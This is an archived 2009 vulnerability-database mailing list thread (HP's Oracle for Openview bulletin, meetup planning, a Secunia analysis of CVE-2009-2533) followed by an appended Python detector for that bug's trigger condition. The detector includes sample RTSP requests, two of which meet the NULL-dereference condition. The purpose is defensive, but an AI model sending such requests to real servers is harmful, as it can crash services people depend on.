Subject: [VIM] HP / OfO vulnerability question
In-Reply-To:
References:
Message-ID: <16F53A6138D7A84D93C3CF09D7291CF056B94A1B4C@GVW0442EXB.americas.hpqcorp.net>

Hello Brian,

Oracle for Openview (OfO) is Oracle. The only special characteristic of
OfO is that HP provided it in a package with Openview. We issued a Security
Bulletin for OfO because there may have been customers who did not have
support contracts with Oracle and could only get updates from HP.
The purpose of the Security Bulletin was to inform customers how to get the Oracle Critical Patch Updates. We no longer update the Security Bulletin. HPSBMA02133 SSRT061201 rev.9 says: ============== RESOLUTION Note: This will be the last revision of this Security Bulletin. Customers should monitor the Oracle site for future Critical Patch Updates. The schedule for future Oracle Critical Patch Updates is available here: http://www.oracle.com/technology/deploy/security/alerts.htm =============== HP did not request Mitre to assign a CVE. However, we did reference the CVE that Mitre assigned independently. Yours truly, John john.morris at hp.com HP Software Security Response Team (SSRT) -----Original Message----- From: security curmudgeon [mailto:jericho at attrition.org] Sent: Monday, July 27, 2009 4:33 AM To: security-alert Cc: Vulnerability Information Managers Subject: HP / OfO vulnerability question Hello HP, http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00727143 This references CVE-2008-1666, which is not reference in the cpujul2008 Oracle update. Would you please clarify if this CVE identifier covers a vulnerability specific to OfO, or if this bulletin only covers vulnerabilities in the cpujul2008 advisory? Thank you, Brian OSVDB.org From jericho at attrition.org Tue Jul 28 04:11:26 2009 From: jericho at attrition.org (security curmudgeon) Date: Tue, 28 Jul 2009 04:11:26 +0000 (UTC) Subject: [VIM] annual VIM gathering at Black Hat / Defcon In-Reply-To: References: Message-ID: : Well? Should we have another gathering? : : Fridays seem to work well because we may have stragglers from Black Hat : and people coming in for Defcon. I assume that Quark's is gone. Last Quark's is gone, yes. : year we went to some restaurant near Quark's that provided adequate : food/drink although the layout wasn't the best. On the other hand, it : was right next to the Riviera. Anybody have other suggestions? I guess it depends on time. 
If we coincide with a meal, doing at a place with decent food makes sense. If off food hours, any random bar usually works. From jkouns at opensecurityfoundation.org Wed Jul 29 01:55:54 2009 From: jkouns at opensecurityfoundation.org (jkouns) Date: Tue, 28 Jul 2009 21:55:54 -0400 Subject: [VIM] annual VIM gathering at Black Hat / Defcon In-Reply-To: References: Message-ID: <4A6FAC2A.3060808@opensecurityfoundation.org> > : year we went to some restaurant near Quark's that provided adequate > : food/drink although the layout wasn't the best. On the other hand, it > : was right next to the Riviera. Anybody have other suggestions? > > I guess it depends on time. If we coincide with a meal, doing at a place > with decent food makes sense. If off food hours, any random bar usually > works. I am game for something on Friday. Guessing we will plan something a bit last minute. So if anyone is interested in attending then make sure you let one of us know! Perhaps a Peppermill lunch? =) From che at secunia.com Wed Jul 29 08:33:55 2009 From: che at secunia.com (Carsten H. Eiram) Date: Wed, 29 Jul 2009 10:33:55 +0200 Subject: [VIM] CVE-2009-2533 Message-ID: <1248856435.25272.5.camel@TS-HQ-4> When analysing this vulnerability we noticed that the NULL pointer dereference error does actually not occur because the "DataConvertBuffer" property is empty, but instead because the provided PoC includes a "DataConvertBuffer" property, but no "Content-Length" header. Any SET_PARAMETER request containing a "DataConvertBuffer" property (not necessarily empty) and either no "Content-Length" header or an invalid one triggers the NULL pointer dereference error. Our advisory, SA35815, contains a bit more information. -- Med venlig hilsen / Kind regards Carsten H. Eiram Chief Security Specialist Secunia Weidekampsgade 14 A DK-2300 Copenhagen S Denmark Phone +45 7020 5144 Fax +45 7020 5145 From coley at linus.mitre.org Fri Jul 31 18:28:52 2009 From: coley at linus.mitre.org (Steven M. 
Christey) Date: Fri, 31 Jul 2009 14:28:52 -0400 (EDT) Subject: [VIM] annual VIM gathering at Black Hat / Defcon In-Reply-To: <4A6FAC2A.3060808@opensecurityfoundation.org> References: <4A6FAC2A.3060808@opensecurityfoundation.org> Message-ID: Some of us talked on Thursday, and the agreement is to meet at the registration desk at the Riviera at 5 PM today, then work out some options from there. Hope to see people then! - Steve
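Editor's added example (not part of the list archive, not Secunia's code and not the affected server's code): the trigger condition Carsten Eiram describes for CVE-2009-2533 in his message above, written as a classifier over raw RTSP requests. Everything it keys on comes from that message: the SET_PARAMETER method, a "DataConvertBuffer" property in the body, and a "Content-Length" header that is absent or invalid, with the property's value (empty or not) deliberately ignored. The sample requests, the rtsp://example.invalid target and the reading of "invalid" as "not a non-negative decimal integer" are constructed assumptions for the example.

```python
"""
Classifier for the CVE-2009-2533 trigger condition as described on the
VIM list: an RTSP SET_PARAMETER request carrying a "DataConvertBuffer"
property with a missing or invalid Content-Length header.
Added example code; the RTSP samples below are constructed.
"""
import re
from dataclasses import dataclass, field

CRLF = b"\r\n"


@dataclass
class RtspRequest:
    method: str
    target: str
    version: str
    headers: dict = field(default_factory=dict)  # header names lower-cased
    body: bytes = b""


def parse_rtsp(raw: bytes) -> RtspRequest:
    """Minimal RTSP/1.0 request parser: request line, headers, raw body.
    Raises ValueError on a malformed request line or header line."""
    head, sep, body = raw.partition(CRLF + CRLF)
    lines = head.split(CRLF)
    parts = lines[0].decode("ascii", "replace").split(" ")
    if len(parts) != 3:
        raise ValueError("malformed request line")
    method, target, version = parts
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.decode("ascii", "replace").partition(":")
        if not colon:
            raise ValueError(f"malformed header line: {line!r}")
        headers[name.strip().lower()] = value.strip()
    return RtspRequest(method, target, version, headers, body if sep else b"")


def content_length_state(headers: dict) -> str:
    """'missing', 'invalid' (not a non-negative decimal; assumed reading
    of 'invalid'), or 'ok'."""
    value = headers.get("content-length")
    if value is None:
        return "missing"
    if not re.fullmatch(r"[0-9]+", value):
        return "invalid"
    return "ok"


def has_property(body: bytes, name: bytes) -> bool:
    """True if the text/parameters body has a 'name:' line; the value may be
    empty, which per the analysis makes no difference."""
    for line in body.split(CRLF):
        key = line.partition(b":")[0].strip()
        if key.lower() == name.lower():
            return True
    return False


def matches_trigger(req: RtspRequest) -> bool:
    """SET_PARAMETER + DataConvertBuffer property + Content-Length absent
    or invalid: the condition from the Secunia analysis quoted above."""
    return (
        req.method == "SET_PARAMETER"
        and has_property(req.body, b"DataConvertBuffer")
        and content_length_state(req.headers) != "ok"
    )


def classify(raw: bytes) -> str:
    """Return 'trigger', 'benign' or 'malformed' for a raw RTSP request."""
    try:
        req = parse_rtsp(raw)
    except ValueError:
        return "malformed"
    return "trigger" if matches_trigger(req) else "benign"


def build(method: str, headers, body: bytes = b"") -> bytes:
    """Assemble a constructed RTSP request (sample data for this example)."""
    lines = [f"{method} rtsp://example.invalid/stream RTSP/1.0"]
    lines += [f"{k}: {v}" for k, v in headers]
    return CRLF.join(line.encode() for line in lines) + CRLF + CRLF + body


PARAM_EMPTY = b"DataConvertBuffer:\r\n"
PARAM_SET = b"DataConvertBuffer: 4096\r\n"

SAMPLES = {
    # empty property but a correct Content-Length: per the analysis, no trigger
    "empty_with_length": build("SET_PARAMETER",
        [("CSeq", "1"), ("Content-Type", "text/parameters"),
         ("Content-Length", str(len(PARAM_EMPTY)))], PARAM_EMPTY),
    # non-empty property, Content-Length missing: trigger
    "no_length": build("SET_PARAMETER",
        [("CSeq", "2"), ("Content-Type", "text/parameters")], PARAM_SET),
    # non-empty property, Content-Length not a number: trigger
    "bad_length": build("SET_PARAMETER",
        [("CSeq", "3"), ("Content-Length", "abc")], PARAM_SET),
    # same header defect on another method: not the described code path
    "other_method": build("GET_PARAMETER", [("CSeq", "4")], PARAM_SET),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:18s} -> {classify(raw)}")
```

The check only says whether a request matches the described condition; it cannot tell whether a particular server build actually dereferences NULL on it. The two SET_PARAMETER samples that differ only in the header show the point of Carsten's correction: a request with an empty property and a correct Content-Length is classified benign, while a populated property with no Content-Length is flagged.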